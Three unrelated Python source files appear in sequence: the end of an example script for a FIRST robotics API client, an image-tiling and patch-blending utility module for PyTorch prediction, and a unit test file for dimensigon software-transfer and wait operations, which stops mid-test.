last_modified = tba.team_districts(1418, last_modified=True) match = tba.match(year=2017, event='chcmp', type='sf', number=2, round=1) events = tba.team_events(148, 2016) robots = tba.team_robots(4131) print('-' * 10 + ' Object Syntax' + '-' * 10) print('Team 254 is from %s in %s, %s.' % (team.city, team.state_prov, team.country)) print('Team 1418 is/was in the %s district in the most recent year of competition.' % districts[-1].display_name) print('The second qual match at the 2017 CHS District Championship was predicted to start at Unix Time %s.' % match.predicted_time) print('In 2016, team 148 was in %d events: %s.' % (len(events), ', '.join(event.event_code for event in events))) print('Team 4131\'s robots: ' + ', '.join('%s (%d)' % (robot.robot_name, robot.year) for robot in robots)) print('Robots have attribute name:', hasattr(robots[0], 'name')) print('Robots have attribute robot_name:', hasattr(robots[0], 'robot_name')) print() print('-' * 8 + ' Dictionary Syntax' + '-' * 8) print('Team 254 is from %s in %s, %s.' % (team['city'], team['state_prov'], team['country'])) print('Team 1418 is/was in the %s district in the most recent year of competition.' % districts[-1]['display_name']) print('The second qual match at the 2017 CHS District Championship was predicted to start at Unix Time %s.' % match['predicted_time']) print('In 2016, team 148 was in %d events: %s.' % (len(events), ', '.join(event['event_code'] for event in events))) print('Team 4131\'s robots: ' + ', '.join('%s (%d)' % (robot['robot_name'], robot['year']) for robot in robots)) print('Robots have attribute name:', 'name' in robots[0]) print('Robots have attribute robot_name:', 'robot_name' in robots[0]) print() print('-' * 5 + ' .raw() Dictionary Syntax' + '-' * 5) print('Team 254 is from %s in %s, %s.' % (team.raw()['city'], team.raw()['state_prov'], team.raw()['country'])) print('Team 1418 is/was in the %s district in the most recent year of competition.' % districts[-1].raw()['display_name']) print('The second qual match at the 2017 CHS District Championship was predicted to start at Unix Time %s.' % match.raw()['predicted_time']) print('In 2016, team 148 was in %d events: %s.' % (len(events), ', '.join(event.raw()['event_code'] for event in events))) print('Team 4131\'s robots: ' + ', '.join('%s (%d)' % (robot.raw()['robot_name'], robot.raw()['year']) for robot in robots)) print('Robots have attribute name:', 'name' in robots[0].raw()) print('Robots have attribute robot_name:', 'robot_name' in robots[0].raw()) print() print('-' * 8 + ' If-Modified-Since Header ' + '-' * 8) def fetch_cached_value(): return [tbapy.District({ 'city': 'Falls Church', 'state_prov': 'Virginia', 'country': 'USA', 'cached': 'cached?' })] date_last = last_modified.date date_old = datetime.datetime.utcnow().replace(year=2015) districts = tba.team_districts(1418, if_modified_since=date_last) or fetch_cached_value() print(f'Recent date -- Was the cached value used? {districts[0].get("cached") is not None}') districts = tba.team_districts(1418, if_modified_since=date_old) or fetch_cached_value() print(f'Old date -- Was the cached value used? {districts[0].get("cached") is not None}') data_utils/crop_utils.py from operator import sub import sys import numpy as np import scipy.signal from torch.nn.modules.activation import LeakyReLU from config_args import parse_args import multiprocessing as mp import torch import torch.nn as nn cached_2d_windows = dict() def crop_frames(args, data): """ Indexing is done this way ################## # 1 # 2 # 3 # # 4 # 5 # 6 # ################# """ if args.num_features % (args.v_crop_scale * args.h_crop_scale) != 0: print("Incorrect Crop Scaling selected. Please ensure original dimension is divisible by crop ratio.") sys.exit() frames = [] # Split frames # In: batch, seq, dim, dim # Out: [batch, seq, dim/scale, dim] * scale h_frames = np.split(data, args.h_crop_scale, -2) # In: [batch, seq, dim/scale, dim] * scale for f in h_frames: frames += np.split(f, args.v_crop_scale, -1) frames = np.concatenate(frames, axis=0) return frames def fix_boundaries(args, predict_values): fix_idx = args.fix_boundary_len predict_values_fix = np.empty(shape=predict_values.shape) predict_values_fix[:, :, fix_idx:-fix_idx, fix_idx:-fix_idx] = \ predict_values[:, :, fix_idx:-fix_idx, fix_idx:-fix_idx] # Final dim: batch, samples, seq_len, 1 top_row_fix = predict_values[:, :, fix_idx, fix_idx:-fix_idx] top_row_fix = np.concatenate(([top_row_fix[:, :, 0][..., np.newaxis]] * fix_idx + [top_row_fix] + [top_row_fix[:, :, -1][..., np.newaxis]] * fix_idx), axis=-1) bot_row_fix = predict_values[:, :, -fix_idx, fix_idx:-fix_idx] bot_row_fix = np.concatenate(([bot_row_fix[:, :, 0][..., np.newaxis]] * fix_idx + [bot_row_fix] + [bot_row_fix[:, :, -1][..., np.newaxis]] * fix_idx), axis=-1) # Final dim: batch, samples, seq_len, row_size left_col_fix = predict_values[:, :, fix_idx:-fix_idx, fix_idx] right_col_fix = predict_values[:, :, fix_idx:-fix_idx, -fix_idx] for i in range(fix_idx): predict_values_fix[:, :, i, :] = top_row_fix predict_values_fix[:, :, -(i+1), :] = bot_row_fix predict_values_fix[:, :, fix_idx:-fix_idx, i] = left_col_fix predict_values_fix[:, :, fix_idx:-fix_idx, -(i+1)] = right_col_fix return predict_values_fix def stitch_frames(args, z, each_frame, chunk_size): b = int(z.shape[0] / each_frame) y = np.empty((b, z.shape[1], args.xdim, args.ydim)) crop_frame = int(args.xdim / args.h_crop_scale) i = 0 for r in range(args.h_crop_scale): row = int(r * crop_frame) for c in range(args.v_crop_scale): col = int(c * crop_frame) for b in range(chunk_size): y[b, :, row:row + crop_frame, col:col + crop_frame] = z[i] i += 1 return y # This is a bit of hand wavy method since hdf5 is not so great at indexing, # and that comes at a cost of size and performance, so we do it heuristically def construct_frames(args, x, data_name, total_len): each_frame = int(args.v_crop_scale * args.h_crop_scale) chunk_frames = int(args.chunk_size * each_frame) chunk_size = args.chunk_size y = None chunk_idx = 0 # for chunk_idx in range(0, total_len, args.chunk_size): break_next = False # print(f'Total Length: {total_len}') while True: # print(f'Idx: {chunk_idx}') if chunk_idx + chunk_frames > total_len - 1: # print(f'Idx: {chunk_idx}, Check: {chunk_idx + chunk_frames}') chunk_size = int((total_len % chunk_frames) / each_frame) # print(f'Chunk Size: {chunk_size}') break_next = True elif chunk_idx + chunk_frames == total_len - 1: break z = np.concatenate([x[data_name][chunk_idx + i * chunk_size:chunk_idx + (i+1) * chunk_size] for i in range(each_frame)]) if args.fix_boundary: z = fix_boundaries(args, z) # chunk, seq_len, dim, dim if y is None: # print(f'Stitching: {z.shape} and C: {chunk_size}') y = stitch_frames(args, z, each_frame, chunk_size) else: # print(f'Stitching: {z.shape} and C: {chunk_size}') y = np.concatenate([y, stitch_frames(args, z, each_frame, chunk_size)]) chunk_idx += chunk_frames if break_next: break return y def undo_single_crop(args, h_pred): y = np.empty((1, h_pred.shape[1], args.xdim, args.ydim)) crop_frame = int(args.xdim / args.h_crop_scale) i = 0 for r in range(args.h_crop_scale): row = int(r * crop_frame) for c in range(args.v_crop_scale): col = int(c * crop_frame) y[0, :, row:row + crop_frame, col:col + crop_frame] = h_pred[i] i += 1 return y """ Overlap + Crop for Training """ # In: batch, seq, dim, dim def crop_overlap_frames(args, data): aug = int(round(args.window_size * (1 - 1.0/args.subdivisions))) more_borders = ((0, 0), (0, 0), (aug, aug), (aug, aug)) padded_img = np.pad(data, pad_width=more_borders, mode='reflect') step = int(args.window_size/args.subdivisions) padx_len = padded_img.shape[-2] pady_len = padded_img.shape[-1] subdivs = [] for i in range(0, padx_len-args.window_size+1, step): for j in range(0, padx_len-args.window_size+1, step): patch = padded_img[:, :, i:i+args.window_size, j:j+args.window_size] subdivs.append(patch) subdivs = np.concatenate(subdivs, axis=0) return subdivs """ Overlapping Technique to blend edges Used for Single Prediction https://github.com/Vooban/Smoothly-Blend-Image-Patches """ # Single Based def predict_tiles(pads, y_data, args, trainer): res_mean = [] res_std = [] for pad in pads: # For every rotation: sd_mean, sd_std = _windowed_subdivs(pad, y_data, args.window_size, args.subdivisions, trainer, args) # output - sub_div * batch, seq, dim + window_size * (1 - 1 / subdivisions), dim + window_size * (1 - 1 / subdivisions) one_padded_result_mean = _recreate_from_subdivs( sd_mean, args.window_size, args.subdivisions, padded_out_shape=list(pad.shape)) one_padded_result_std = _recreate_from_subdivs( sd_std, args.window_size, args.subdivisions, padded_out_shape=list(pad.shape)) res_mean.append(one_padded_result_mean) res_std.append(one_padded_result_std) return res_mean, res_std def _windowed_subdivs(padded_img, y_data, window_size, subdivisions, trainer, args): """ Create tiled overlapping patches. Returns: 5D numpy array of shape = ( nb_patches_along_X, nb_patches_along_Y, patches_resolution_along_X, patches_resolution_along_Y, nb_output_channels ) Note: patches_resolution_along_X == patches_resolution_along_Y == window_size """ WINDOW_SPLINE_2D = np.squeeze(_window_2D(window_size=window_size, power=2)) step = int(window_size/subdivisions) padx_len = padded_img.shape[-2] pady_len = padded_img.shape[-1] subdivs = [] # print(f'Input Shape for Subdivision: {padded_img.shape}') for i in range(0, padx_len-window_size+1, step): subdivs.append([]) for j in range(0, padx_len-window_size+1, step): patch = padded_img[:, :, i:i+window_size, j:j+window_size] subdivs[-1].append(patch) # Here, `gc.collect()` clears RAM between operations. # It should run faster if they are removed, if enough memory is available. # gc.collect() subdivs = np.array(subdivs) # print(f'Sub Division shape: {subdivs.shape}') # gc.collect() #a: list of sub-divisions (overlaps), b: batch, c: seq len, d: xdim, e: ydim a, b, c, d, e, f = subdivs.shape # subdivs = np.expand_dims(subdivs.reshape(a * b * c * d, e, f), -1) subdivs = subdivs.reshape(a * b * c, d, e, f) # print(f'Sub Division Shape Into Network: {subdivs.shape}') # print(f'Y Data Into Network: {y_data.shape}') # gc.collect() # print(subdivs.shape) subdivs = torch.as_tensor(subdivs, dtype=torch.float32) y_data = torch.as_tensor(y_data, dtype=torch.float32) pred = trainer.predict_one(subdivs, y_data, args.n_samples) subdivs_mean, subdivs_std = pred # print(f"Sub Mean Out N/W: {subdivs_mean.shape}, Std {subdivs_std.shape}") # subdivs = pred_func(subdivs) # gc.collect() # subdivs_mean = [s.reshape(s.shape[-2], s.shape[-1], 1) for s in subdivs_mean] # subdivs_std = [s.reshape(s.shape[-2], s.shape[-1]) for s in subdivs_std] subdivs_mean = np.array([patch * WINDOW_SPLINE_2D for patch in subdivs_mean]) subdivs_std = np.array([patch * WINDOW_SPLINE_2D for patch in subdivs_std]) # gc.collect() # Such 5D array: subdivs_mean = subdivs_mean.reshape(a, b, c, d, e, f) subdivs_std = subdivs_std.reshape(a, b, c, d, e, f) # print(f"Sub Mean Out After Window: {subdivs_mean.shape}, Std {subdivs_std.shape}") # gc.collect() return (subdivs_mean, subdivs_std) # # Batch Based # Bit of a handwavy where we only batch for inference and do a naive way for processing def predict_batch_tiles(pads, y_data, args, trainer): # Save shapes for reconstructing pad_shape = np.stack(pads).shape pad_b_len = pads[0].shape[0] # Returns list of subdivisions across all paddings # Shape of a * b * c, d, e, f for each pad with mp.Pool(args.data_proc_workers) as pool: subdvis, subdivs_shape = pool.map(_create_subdvis, [(pads, args.window_size, args.subdivisions)])[0] #subdvis, subdivs_shape = _create_subdvis(pads, args.window_size, args.subdivisions) # Stack subdivs into a batch and then performs prediction subdivs_mean, subdivs_std = _predict_batch_subdivs(subdvis, y_data, trainer, args) # Reconstruct it as a list as the same shape as input list and with mp.Pool(args.data_proc_workers) as pool: subdivs_mean = pool.map(_recreate_split_frames, [(subdivs_mean, pads, subdivs_shape, args)])[0] with mp.Pool(args.data_proc_workers) as pool: subdivs_std = pool.map(_recreate_split_frames, [(subdivs_std, pads, subdivs_shape, args)])[0] #subdivs_mean = _recreate_split_frames(subdivs_mean, pads, subdivs_shape, args) #subdivs_std = _recreate_split_frames(subdivs_std, pads, subdivs_shape, args) with mp.Pool(args.data_proc_workers) as pool: res_mean, res_std = pool.map(recreate_sub_div_lists, [(subdivs_mean, subdivs_std, args, pads)])[0] # for sd_mean in subdivs_mean: # one_padded_result_mean = _recreate_from_subdivs( # sd_mean, args.window_size, args.subdivisions, # padded_out_shape=list(pads[0].shape)) # res_mean.append(one_padded_result_mean) # for sd_std in subdivs_std: # one_padded_result_std = _recreate_from_subdivs( # sd_std, args.window_size, args.subdivisions, # padded_out_shape=list(pads[0].shape)) # res_std.append(one_padded_result_std) return res_mean, res_std def recreate_sub_div_lists(argv): subdivs_mean, subdivs_std, args, pads = argv res_mean = [] res_std = [] for sd_mean in subdivs_mean: one_padded_result_mean = _recreate_from_subdivs( sd_mean, args.window_size, args.subdivisions, padded_out_shape=list(pads[0].shape)) res_mean.append(one_padded_result_mean) for sd_std in subdivs_std: one_padded_result_std = _recreate_from_subdivs( sd_std, args.window_size, args.subdivisions, padded_out_shape=list(pads[0].shape)) res_std.append(one_padded_result_std) return (res_mean, res_std) def _create_subdvis(argv): pads, window_size, subdivisions = argv """ Create tiled overlapping patches. Returns: 5D numpy array of shape = ( nb_patches_along_X, nb_patches_along_Y, patches_resolution_along_X, patches_resolution_along_Y, nb_output_channels ) Note: patches_resolution_along_X == patches_resolution_along_Y == window_size """ subdivs_list = [] subdivs_shape_list = [] subdivs_patch_list = [] for padded_img in pads: step = int(window_size/subdivisions) padx_len = padded_img.shape[-2] pady_len = padded_img.shape[-1] subdivs = [] # print(f'Input Shape for Subdivision: {padded_img.shape}') for i in range(0, padx_len-window_size+1, step): subdivs.append([]) for j in range(0, padx_len-window_size+1, step): patch = padded_img[:, :, i:i+window_size, j:j+window_size] subdivs[-1].append(patch) # Here, `gc.collect()` clears RAM between operations. # It should run faster if they are removed, if enough memory is available. # gc.collect() subdivs = np.array(subdivs) # print(f'Sub Division shape: {subdivs.shape}') # gc.collect() #a: list of sub-divisions (overlaps), b: batch, c: seq len, d: xdim, e: ydim a, b, c, d, e, f = subdivs.shape # subdivs = np.expand_dims(subdivs.reshape(a * b * c * d, e, f), -1) subdivs = subdivs.reshape(a * b * c, d, e, f) # print(f'Sub Division Shape Into Network: {subdivs.shape}') # print(f'Y Data Into Network: {y_data.shape}') # gc.collect() # print(subdivs.shape) subdivs_list.append(subdivs) subdivs_shape_list.append((a, b, c, d, e, f)) return subdivs_list, subdivs_shape_list def _predict_batch_subdivs(subdivs, y_data, trainer, args): subdivs = np.concatenate(subdivs, axis=0) if subdivs.shape[0] > args.batch_size: subdivs = np.array_split(subdivs, subdivs.shape[0] // args.batch_size + 1) else: subdivs = [subdivs] y_data = torch.as_tensor(y_data, dtype=torch.float32) pred_mean_out = [] pred_std_out = [] for subdiv in subdivs: subdiv = torch.as_tensor(subdiv, dtype=torch.float32) pred_mean, pred_std = trainer.predict_one(subdiv, y_data, args.n_samples) pred_mean_out.append(pred_mean) pred_std_out.append(pred_std) return np.concatenate(pred_mean_out), np.concatenate(pred_std_out) def _recreate_split_frames(argv): subdivs_in, pads, subdivs_shape, args = argv i = 0 subdivs = np.split(subdivs_in, len(subdivs_shape)) # for pad in pads: # subdivs.append(subdivs_in[i:i + len(pad)]) # i += len(pad) WINDOW_SPLINE_2D = np.squeeze(_window_2D(window_size=args.window_size, power=2)) out = [] for i, subdiv in enumerate(subdivs): a, b, c, d, e, f = subdivs_shape[i] subdiv = np.array([patch * WINDOW_SPLINE_2D for patch in subdiv]) out.append(subdiv.reshape(a, b, c, d, e, f)) return out # Weighting Technique def _spline_window(window_size, power=2): """ Squared spline (power=2) window function: https://www.wolframalpha.com/input/?i=y%3Dx**2,+y%3D-(x-2)**2+%2B2,+y%3D(x-4)**2,+from+y+%3D+0+to+2 """ intersection = int(window_size/4) wind_outer = (abs(2*(scipy.signal.triang(window_size))) ** power)/2 wind_outer[intersection:-intersection] = 0 wind_inner = 1 - (abs(2*(scipy.signal.triang(window_size) - 1)) ** power)/2 wind_inner[:intersection] = 0 wind_inner[-intersection:] = 0 wind = wind_inner + wind_outer wind = wind / np.average(wind) return wind def _window_2D(window_size, power=2): """ Make a 1D window function, then infer and return a 2D window function. Done with an augmentation, and self multiplication with its transpose. Could be generalized to more dimensions. """ # Memoization global cached_2d_windows key = "{}_{}".format(window_size, power) if key in cached_2d_windows: wind = cached_2d_windows[key] else: wind = _spline_window(window_size, power) # print(f'Spline Window Shape: {wind.shape}') wind = np.expand_dims(np.expand_dims(wind, 1), 1) wind = wind * wind.transpose(1, 0, 2) # if PLOT_PROGRESS: # # For demo purpose, let's look once at the window: # plt.imshow(wind[:, :, 0], cmap="viridis") # plt.title("Windowing Function (2D) 32x32 used for blending \n" # " the overlapping patches (Interpolation)") # plt.show() cached_2d_windows[key] = wind return wind # Generate Mirror Padded Image First def _pad_img(img, window_size, subdivisions): """ Add borders to img for a "valid" border pattern according to "window_size" and "subdivisions". Image is an np array of shape (x, y, nb_channels). """ aug = int(round(window_size * (1 - 1.0/subdivisions))) more_borders = ((0, 0), (0, 0), (aug, aug), (aug, aug)) ret = np.pad(img, pad_width=more_borders, mode='reflect') # gc.collect() return ret def _unpad_img(padded_img, window_size, subdivisions): """ Undo what's done in the `_pad_img` function. Image is an np array of shape (x, y, nb_channels). """ aug = int(round(window_size * (1 - 1.0/subdivisions))) ret = padded_img[ :, :, aug:-aug, aug:-aug ] # gc.collect() return ret def _rotate_mirror_do(im): """ Duplicate an np array (image) of shape (x, y, nb_channels) 8 times, in order to have all the possible rotations and mirrors of that image that fits the possible 90 degrees rotations. It is the D_4 (D4) Dihedral group: https://en.wikipedia.org/wiki/Dihedral_group """ mirrs = [] mirrs.append(np.array(im)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=1)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=2)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=3)) im = np.array(im)[:, :, :, ::-1] mirrs.append(np.array(im)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=1)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=2)) mirrs.append(np.rot90(np.array(im), axes=(-2, -1), k=3)) # mirrs = np.concatenate(mirrs, axis=0) return mirrs def _rotate_mirror_undo(im_mirrs): """ merges a list of 8 np arrays (images) of shape (x, y, nb_channels) generated from the `_rotate_mirror_do` function. Each images might have changed and merging them implies to rotated them back in order and average things out. It is the D_4 (D4) Dihedral group: https://en.wikipedia.org/wiki/Dihedral_group """ origs = [] origs.append(np.array(im_mirrs[0])) origs.append(np.rot90(np.array(im_mirrs[1]), axes=(-2, -1), k=3)) origs.append(np.rot90(np.array(im_mirrs[2]), axes=(-2, -1), k=2)) origs.append(np.rot90(np.array(im_mirrs[3]), axes=(-2, -1), k=1)) origs.append(np.array(im_mirrs[4])[:, :, :, ::-1]) origs.append(np.rot90(np.array(im_mirrs[5]), axes=(-2, -1), k=3)[:, :, :, ::-1]) origs.append(np.rot90(np.array(im_mirrs[6]), axes=(-2, -1), k=2)[:, :, :, ::-1]) origs.append(np.rot90(np.array(im_mirrs[7]), axes=(-2, -1), k=1)[:, :, :, ::-1]) return np.mean(origs, axis=0) def _recreate_from_subdivs(subdivs, window_size, subdivisions, padded_out_shape): """ Merge tiled overlapping patches smoothly. """ step = int(window_size/subdivisions) padx_len = padded_out_shape[-2] pady_len = padded_out_shape[-1] y = np.zeros(padded_out_shape) # print(y.shape) # print(subdivs.shape) a = 0 for i in range(0, padx_len-window_size+1, step): b = 0 for j in range(0, padx_len-window_size+1, step): windowed_patch = subdivs[a, b] # print(windowed_patch.shape) y[:, :, i:i+window_size, j:j+window_size] = y[:, :, i:i+window_size, j:j+window_size] + windowed_patch b += 1 a += 1 return y / (subdivisions ** 2) def prep_overlap(argv): args, data = argv pad = _pad_img(data, args.window_size, args.subdivisions) #pads = _rotate_mirror_do(pad) pads = [pad] return pads def undo_overlap(argv): args, data = argv #data = _rotate_mirror_undo(data) prd = _unpad_img(data[0], args.window_size, args.subdivisions) prd = prd[:, :, :prd.shape[-2], :prd.shape[-1]] return prd # We will pass individual data to this to keep things simple # Then convert it torch tensors and back again def predict_with_tiling(args, data, pred_func): data = np.random.uniform(0, 1, size=(10, 4, 100, 100)) # Input: batch, seq, dim, dim # Mirror Pad images first # Adds 1/2 size of window_size pixels across the edges of the input image # to remove zero padding effects # Mirror Pad: batch, seq, dim + window_size * (1 - 1/subdivisions), dim + window_size * (1 - 1/subdivisions) pad = _pad_img(data, args.window_size, args.subdivisions) print(f'Pad Shape: {pad.shape}') # Rotates each image 4x times + Mirror and rotate for a total of 8x images returns as a list # Rotate Pad: 8, batch, seq, dim + window_size * (1 - 1/subdivisions), dim + window_size * (1 - 1/subdivisions) pads = _rotate_mirror_do(pad) print(f'Rotate Shape: {len(pads)}, and {pad[0].shape}') res = [] for pad in pads: # For every rotation: sd = _windowed_subdivs(pad, args.window_size, args.subdivisions, pred_func) # output - sub_div * batch, seq, dim + window_size * (1 - 1 / subdivisions), dim + window_size * (1 - 1 / subdivisions) one_padded_result = _recreate_from_subdivs( sd, args.window_size, args.subdivisions, padded_out_shape=list(pad.shape)) res.append(one_padded_result) # Merge after rotations: padded_results = _rotate_mirror_undo(res) print(f'Final padded Shape: {padded_results.shape}') prd = _unpad_img(padded_results, args.window_size, args.subdivisions) print(f'Final Unpadded Shape: {prd.shape}') prd = prd[:, :, :data.shape[-2], :data.shape[-1]] print(f'Final Shape: {prd.shape}') return prd # # # if __name__ == '__main__': # args = parse_args() # predict_with_tiling(args, None, None) 1-10 import sqlite3 import sys import unittest from unittest import mock from unittest.case import TestCase from unittest.mock import Mock import flask import dimensigon.use_cases from dimensigon.domain.entities import ActionTemplate, Server, Software, SoftwareServerAssociation, Scope from dimensigon.domain.entities.bootstrap import set_initial from dimensigon.domain.entities.user import ROOT from dimensigon.use_cases.operations import RequestOperation, NativeWaitOperation, NativeSoftwareSendOperation from dimensigon.web import db, errors from dimensigon.web.network import Response from tests.base import FlaskAppMixin, TestDimensigonBase class Context: def __init__(self, env=None): self.env = env or {} class TestNativeSoftwareSendOperation(TestDimensigonBase): def setUp(self) -> None: super().setUp() self.context = Context(dict(executor_id=ROOT)) @mock.patch('dimensigon.use_cases.operations.ntwrk.get') @mock.patch('dimensigon.use_cases.operations.ntwrk.post') def test_execute_send_software(self, mock_post, mock_get): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version=1, filename='test.zip') node1 = Server('nodeA', port=5000) node2 = Server('nodeB', port=5000) ssa1 = SoftwareServerAssociation(software=soft, server=node1, path='/') ssa2 = SoftwareServerAssociation(software=soft, server=node2, path='/') ssa3 = SoftwareServerAssociation(software=soft, server=self.s1, path='/') db.session.add_all([soft, node1, node2, ssa1, ssa2, ssa3]) mock_post.return_value = Response(msg={'transfer_id': 1}, code=at.expected_rc) mock_get.return_value = Response(msg={ "route_list": [ { "cost": 0, "destination_id": f"{node1.id}", }, { "cost": 1, "destination_id": f"{self.s1.id}", } ], }, code=200, server=node2) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute( dict(input=dict(software=soft.id, server=node2.id, dest_path='dest', chunk_size=20, max_senders=2)), timeout=None, context=self.context) mock_post.assert_called_once_with(node1, 'api_1_0.send', json=dict(software_id=str(soft.id), dest_server_id=str(node2.id), background=False, include_transfer_data=True, force=True, dest_path='dest', chunk_size=20, max_senders=2), timeout=None, identity=ROOT) self.assertTrue(cp.success) self.assertEqual(flask.json.dumps(mock_post.return_value.msg), cp.stdout) def test_execute_send_software_no_software(self): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) with self.subTest("pass an invalid id"): soft_id = '00000000-0000-0000-0000-000000000001' cp = ro._execute(dict(input=dict(software=soft_id, server=self.s1.id)), timeout=None, context=self.context) self.assertFalse(cp.success) self.assertEqual(f"software id '{soft_id}' not found", cp.stderr) with self.subTest("pass an invalid name"): cp = ro._execute(dict(input=dict(software='software', server=self.s1.id)), timeout=None, context=self.context) self.assertFalse(cp.success) self.assertEqual(f"No software found for 'software'", cp.stderr) soft = Software(name='test', version="1", filename='test.zip') db.session.add(soft) with self.subTest("pass an invalid version"): cp = ro._execute(dict(input=dict(software='test', version="2.1", server=self.s1.id)), timeout=None, context=self.context) self.assertFalse(cp.success) self.assertEqual(f"No software found for 'test' and version '2.1'", cp.stderr) def test_execute_send_software_no_destination_server(self): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version='1', filename='test.zip') soft2 = Software(name='test', version='2', filename='test.zip') node1 = Server('nodeA', port=5000) ssa1 = SoftwareServerAssociation(software=soft2, server=node1, path='/') db.session.add_all([soft, soft2, node1, ssa1]) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute(dict(input=dict(software='test', server='a')), context=self.context) self.assertFalse(cp.success) self.assertEqual(f"destination server 'a' not found", cp.stderr) @mock.patch('dimensigon.use_cases.operations.ntwrk.get') def test_execute_send_software_no_ssa(self, mock_get): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version=1, filename='test.zip') node1 = Server('nodeA', port=5000) db.session.add_all([soft, node1]) mock_get.return_value = Response(code=400) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute(dict(input=dict(software=soft.id, server=self.s1.id)), context=self.context) self.assertFalse(cp.success) self.assertEqual(f'{soft.id} has no server association', cp.stderr) @mock.patch('dimensigon.use_cases.operations.ntwrk.get') @mock.patch('dimensigon.use_cases.operations.ntwrk.post') def test_execute_send_software_error(self, mock_post, mock_get): at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000001') soft = Software(name='test', version=1, filename='test.zip') node1 = Server('nodeA', port=5000) ssa1 = SoftwareServerAssociation(software=soft, server=node1, path='/') db.session.add_all([soft, node1, ssa1]) mock_post.return_value = Response(msg={'error': 'message'}, code=400) mock_get.return_value = Response(code=400) ro = NativeSoftwareSendOperation(code, expected_stdout=at.expected_stdout, expected_stderr=at.expected_stderr, expected_rc=at.expected_rc) cp = ro._execute(dict(input=dict(software=str(soft.id), server=str(node1.id))), timeout=10, context=self.context) mock_post.assert_called_once_with(node1, 'api_1_0.send', json=dict(software_id=str(soft.id), dest_server_id=str(node1.id), background=False, include_transfer_data=True, force=True), timeout=10, identity=ROOT) self.assertFalse(cp.success) self.assertEqual(flask.json.dumps(mock_post.return_value.msg), cp.stdout) class TestNativeWaitOperation(FlaskAppMixin, TestCase): def setUp(self): super().setUp() set_initial(action_template=True) self.at = ActionTemplate.query.get('00000000-0000-0000-000a-000000000002') self.nwo = NativeWaitOperation(code=code, system_kwargs=dict(sleep_time=0)) self.patcher_lock_scope = mock.patch('dimensigon.use_cases.operations.lock_scope', autospec=True) self.patcher_db = mock.patch('dimensigon.use_cases.operations.db') self.mock_db = self.patcher_db.start() self.mock_lock_scope = self.patcher_lock_scope.start() m = self.mock_db.session.query.return_value = Mock() mm = m.filter.return_value = Mock() self.mmm = mm.filter.return_value = Mock() def tearDown(self) -> None: super().tearDown() self.patcher_lock_scope.stop() self.patcher_db.stop() def test_server_found(self): self.mmm.all.side_effect = [[], [('node1',)]] cp = self.nwo._execute(dict(input=dict(server_names=['node1'])), context=Mock()) self.assertEqual(f"Server node1 found", cp.stdout) self.assertTrue(cp.success) def test_server_notfound(self): self.mmm.all.reset_mock() self.mmm.all.return_value = [] self.mmm.all.side_effect = None cp = self.nwo._execute(dict(input=dict(server_names='node1', timeout=0.01)), context=Mock()) self.assertEqual(f"Server node1 not created after 0.01 seconds", cp.stderr) self.assertFalse(cp.success) def test_wait_multiple_servers(self): self.mmm.all.reset_mock() self.mmm.all.return_value = None self.mmm.all.side_effect = [[('node1',)], sqlite3.OperationalError('database is locked'), []] with mock.patch('dimensigon.use_cases.operations.time.time') as mock_time: mock_time.side_effect = [0, 1, 2, 3] cp = self.nwo._execute(dict(input=dict(server_names=['node1', 'node2', 'node3'], timeout=3)), context=Mock()) self.assertEqual(f"Servers node2, node3 not created after 3 seconds", cp.stderr) self.assertFalse(cp.success) def test_no_server_provided(self): cp = self.nwo._execute(dict(input=dict(server_names=[])), context=Mock()) self.assertEqual(f"No server to wait", cp.stderr) self.assertFalse(cp.success) def test_sqlite_error(self): self.mmm.all.reset_mock() self.mmm.all.return_value = None self.mmm.all.side_effect = [sqlite3.OperationalError(), sqlite3] with mock.patch('dimensigon.use_cases.operations.time.time') as mock_time: mock_time.side_effect = [0, 1, 2] with self.assertRaises(sqlite3.OperationalError): cp = self.nwo._execute(dict(input=dict(server_names=['node1', 'node2', 'node3'])), context=Mock()) def test_lock_error(self): self.mmm.all.reset_mock() self.mmm.all.return_value = None e = errors.LockError(Scope.CATALOG, action='lock', responses=[]) self.mock_lock_scope.side_effect = [e] cp = self.nwo._execute(dict(input=dict(server_names='node1')), context=Mock()) self.assertEqual(str(e), cp.stderr) self.assertFalse(cp.success) # class TestRequestOperation(TestCase): # def setUp(self): # """Create and configure a new app instance for each test.""" # # create the app with common test config # self.app = create_app('test') # self.app_context = self.app.app_context() # self.app_context.push() # self.client = self.app.test_client() # db.create_all() # set_initial(user=True, action_template=True) # self.server = Server.get_current() # self.auth = HTTPBearerAuth(create_access_token(User.get_by_name('root').id)) # # @responses.activate # def test_execute_request(self): # url = 'http://new.url/' # content = {"content": "this is a message"} # responses.add(method='GET', url=url, body=json.dumps(content), status=200, # content_type='application/json') # # ro = RequestOperation('{"method":"get", "url":"{{view_or_url}}"}', # expected_stdout='{}', # expected_stderr='', # expected_rc=200, # post_code="params.update(response.json())") # # params = {"view_or_url": url} # cp = ro.execute(context=params, timeout=None) # # self.assertTrue(cp.success) # self.assertDictEqual({**params, **content}, params) # # @responses.activate # def test_execute_request_timeout(self): # url = 'http://new.url/' # content = {"content": "this is a message"} # responses.add(method='GET', url=url, body=TimeoutError()) # # ro = RequestOperation('{"method":"get", "url":"{{url}}"}', # expected_stdout='{}', # expected_stderr='', # expected_rc=200 # ) # # params = {"url": url} # cp = ro.execute(params, timeout=None) # # self.assertFalse(cp.success) # self.assertEqual(cp.stderr, "TimeoutError") # # @responses.activate # def test_execute_request(self): # url = 'http://new.url/' # content = "response" # responses.add(method='GET', 